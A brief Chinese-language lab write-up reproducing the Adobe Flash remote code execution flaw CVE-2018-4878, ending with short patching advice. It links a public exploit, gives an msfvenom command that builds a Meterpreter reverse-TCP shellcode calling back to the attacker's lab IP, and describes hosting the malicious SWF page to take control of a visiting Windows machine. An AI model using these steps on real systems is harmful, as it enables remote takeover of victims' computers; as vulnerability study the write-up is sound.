Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現
一、漏洞描述
該漏洞可針對windows用戶發起定向攻擊。攻擊者可以誘導用戶打開包含惡意Flash代碼文件的Microsoft Office文檔、網頁、垃圾電子郵件等。
二、漏洞影響版本
Flash Player版本28.0.0.137以及之前的所有版本
三、漏洞復現環境搭建
攻擊機:kali ip:192.168.10.136
靶機:win10 ie默認集成flash,沒有升級
四、漏洞復現
1.github下載exp, https://github.com/anbai-inc/CVE-2018-4878
2.修改exp
2.1修改shellcode為自己生成的反彈連接shellcode,首先先生成反彈連接shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt
2.2用生成的shellcode替換exp中對應的shellcode
2.3修改exp中生成文件保存的路徑
3.運行python腳本,會生成兩個文件, exploit.swf和index.html
4.把exploit.swf和index.html復制到/var/www/html,然后開啟web服務, 此時,Kali Linux上Web服務啟動,並且具備index.html這個頁面。只要靶機啟用flash並訪問了這個頁面,則可以直接被控制
5.kali 開啟監聽
6.靶機訪問http://192.168.10.136/index.html
7.此時kali端已經獲取到會話
五、漏洞防御
1.下載最新版本的Adobe Flash
2.安裝常見殺毒軟件,開啟實時防護和殺毒引擎實時升級